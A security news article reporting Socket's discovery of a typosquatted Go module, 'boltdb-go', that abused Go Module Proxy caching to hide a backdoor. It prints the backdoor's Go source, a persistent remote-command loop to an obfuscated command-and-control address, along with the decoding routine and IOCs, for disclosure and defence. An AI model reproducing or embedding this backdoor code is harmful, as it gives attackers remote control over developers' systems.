Weaponized Go Package Module Let Attackers Gain Remote Access To Infected Systems

Researchers from Socket have uncovered a malicious Go package module that exploits the Go Module Proxy caching mechanism to gain remote access to infected systems. The attack involves a typosquatted version of the popular BoltDB database module, widely used in the Go ecosystem by organizations like Shopify and Heroku. The malicious package, hosted on GitHub […] The post Weaponized Go Package Module Let Attackers Gain Remote Access To Infected Systems appeared first on Cyber Security News.

Feb 5, 2025 - 17:38

Weaponized Go Package Module Let Attackers Gain Remote Access To Infected Systems

Researchers from Socket have uncovered a malicious Go package module that exploits the Go Module Proxy caching mechanism to gain remote access to infected systems.

The attack involves a typosquatted version of the popular BoltDB database module, widely used in the Go ecosystem by organizations like Shopify and Heroku.

Overview of the legitimate BoltDB GitHub repository (Source – Socket)

The malicious package, hosted on GitHub under the alias “boltdb-go,” closely resembles the legitimate BoltDB package (github.com/boltdb/bolt).

Malicious boltdb-go repository (Source – Socket)

This subtle naming variation was designed to deceive developers into selecting the malicious package by mistake or through typographical errors.

The cybersecurity experts at Socket discovered that the package contains a backdoor that enables remote code execution, allowing threat actors to control infected systems via a command and control (C2) server.

Exploiting Go Module Proxy Caching

Once the malicious package was published and cached by the Go Module Proxy, the threat actor altered the Git tags in the source repository to point to a clean, legitimate version.

This deceptive tactic ensured that manual inspections of the GitHub repository would not reveal any traces of malware, while the Go Module Proxy continued serving the cached malicious version to unsuspecting developers.

func ApiInit() {
    go func() {
        defer func() {
            // Persistence mechanism:
            // If the function panics (e.g., connection loss), restart after 30 seconds
            if r := recover(); r != nil {
                time.Sleep(30 * time.Second)
                ApiInit()
            }
        }()
        for {
            d := net.Dialer{Timeout: 10 * time.Second}
            // Obfuscated C2 connection:
            // Constructs a hidden IP address and port using _r()
            conn, err := d.Dial("tcp", _r(strconv.Itoa(MaxMemSize) + strconv.Itoa(MaxIndex) + ":" + strconv.Itoa(MaxPort)))
            if err != nil {
                // Stealth:
                // If the connection fails, retry in 30 seconds to avoid immediate detection
                time.Sleep(30 * time.Second)
                continue
            }
            // Remote command execution loop
            // Reads incoming commands and executes them
            for {
                message, _ := bufio.NewReader(conn).ReadString('\n')
                args, err := shellwords.Parse(strings.TrimSuffix(message, "\n"))
                if err != nil {
                    fmt.Fprintf(conn, "Parse err: %s\n", err)
                    continue
                }
                // Execution of arbitrary shell commands
                var out []byte
                if len(args) == 1 {
                    out, err = exec.Command(args[0]).Output()
                } else {
                    out, err = exec.Command(args[0], args[1:]...).Output()
                }
                // Exfiltration:
                // Sends the command output or error back to the threat actor
                if err != nil {
                    fmt.Fprintf(conn, "%s\n", err)
                }
                fmt.Fprintf(conn, "%s\n", out)
            }
        }
    }()
}

The malicious code uses obfuscation techniques to disguise the C2 server’s IP address. Constants in the cursor.go file are manipulated to construct an obfuscated IP address:-

const (
    MaxMemSize = 64966512577 // Obfuscated IP part
    MaxIndex = 6179852731 // Obfuscated IP part
    MaxPort = 2060272 // Obfuscated port
)

func _r(s string) string {
    // String manipulation / obfuscation
    // Replaces '5' with '.' and removes '6' and '7' to disguise the C2 address
    ret := strings.ReplaceAll(s, "5", ".")
    ret = strings.ReplaceAll(ret, "6", "")
    ret = strings.ReplaceAll(ret, "7", "")
    return ret
}

The transformation process results in the final C2 address: 49.12.198[.]231:20022.

Developers should be cautious when using packages from public repositories and regularly monitor for updates or potential backdoors.

The Go community should also raise awareness about the potential for similar attacks that exploit the caching mechanism of the Go Module Proxy.

Indicators of Compromise (IOCs)

Malicious Go Package: github.com/boltdb-go/bolt
Threat Actor GitHub Alias: boltdb-go
C2 Server: 49.12.198[.]231:20022

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

The post Weaponized Go Package Module Let Attackers Gain Remote Access To Infected Systems appeared first on Cyber Security News.

Weaponized Go Package Module Let Attackers Gain Remote Access To Infected Systems

Exploiting Go Module Proxy Caching

Indicators of Compromise (IOCs)

Tags:

Related Posts

Popular Posts

Recommended Posts